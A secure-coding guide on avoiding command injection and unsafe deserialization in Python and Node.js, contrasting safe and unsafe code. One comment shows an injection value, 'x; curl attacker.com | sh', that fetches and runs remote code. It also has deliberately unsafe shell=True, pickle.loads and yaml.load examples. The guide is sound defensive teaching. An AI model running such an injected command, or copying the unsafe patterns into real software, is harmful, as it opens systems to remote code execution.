Command injection and unsafe deserialization

Two distinct patterns lead to arbitrary code execution in application code: passing user-controlled data to a shell, and deserializing objects from untrusted sources. The RCE attack perspective covers what remote code execution looks like from the other side, and the insecure deserialisation page covers the deserialization attack surface in depth.

Command injection

The problem is not that an application runs external commands. It is how the command is constructed.

Python

subprocess.run() with a list does not invoke a shell. Each list element is a separate argument, so shell metacharacters (; | && > $()) in user input are treated as literal strings, not control flow:

import subprocess

# safe: list form, no shell
def convert_image(input_path: str, output_path: str) -> None:
    subprocess.run(
        ["convert", input_path, output_path],
        check=True,
        capture_output=True,
    )

The unsafe alternative for comparison:

# unsafe: shell=True passes the string to /bin/sh
def convert_image_unsafe(input_path: str, output_path: str) -> None:
    subprocess.run(f"convert {input_path} {output_path}", shell=True)
    # input_path = "x; curl attacker.com | sh"

os.system() and os.popen() always invoke a shell. Both are in the same category.

When a shell is genuinely required (for pipes, shell built-ins, or glob expansion), use shlex.quote() on each user-controlled value before interpolating it into the command string:

import shlex, subprocess

def grep_log(pattern: str, logfile: str) -> str:
    cmd = f"grep {shlex.quote(pattern)} {shlex.quote(logfile)}"
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout

Prefer the list form where possible.

Node.js

child_process.execFile() takes a command and arguments separately and does not invoke a shell:

const { execFile } = require("child_process");
const { promisify } = require("util");
const execFileAsync = promisify(execFile);

async function convertImage(inputPath, outputPath) {
    // safe: execFile does not invoke a shell
    await execFileAsync("convert", [inputPath, outputPath]);
}

exec() and execSync() pass a string to the shell. spawn() with shell: false (the default) is the low-level equivalent of execFile().

Unsafe deserialization

Python pickle

Python’s pickle module can execute arbitrary code during deserialization. Any pickle data from outside the application is a code execution vector:

import pickle

# unsafe: loading attacker-controlled bytes
def load_session(data: bytes):
    return pickle.loads(data)  # attacker can run arbitrary code here

Use JSON for data that crosses trust boundaries. JSON carries no executable semantics:

import json

def load_session(data: str) -> dict:
    return json.loads(data)

When structured Python objects are genuinely needed across a trust boundary, use a schema library (Pydantic, marshmallow, attrs) to deserialize from JSON into validated objects.

YAML

PyYAML’s yaml.load() with the default Loader executes arbitrary Python when it encounters certain YAML constructs. yaml.safe_load() restricts parsing to scalar types and collections:

import yaml

# unsafe: executes Python via !!python/object tags
data = yaml.load(user_input)

# safe: restricted parser, no code execution
data = yaml.safe_load(user_input)

Since PyYAML 6.0 yaml.load() without an explicit Loader raises a warning. Passing Loader=yaml.FullLoader is not sufficient for untrusted input; SafeLoader is the appropriate choice for data from outside the application.

Sandboxed evaluation

When the application requires evaluating user-supplied expressions (calculator, formula engine, template language), a purpose-built library is safer than a general-purpose interpreter:

  • Python: ast.literal_eval() evaluates Python literals only (strings, numbers, lists, dicts, tuples, booleans, None). It does not execute function calls or imports.

  • JavaScript: isolated-vm provides a V8 isolate with explicit memory and CPU limits. vm2 is an alternative though it has had historical escapes; isolated-vm is the more hardened option.

Both approaches have limits. A formula language with access to arbitrary numeric operations can still cause denial of service through resource exhaustion; set explicit timeouts and memory caps.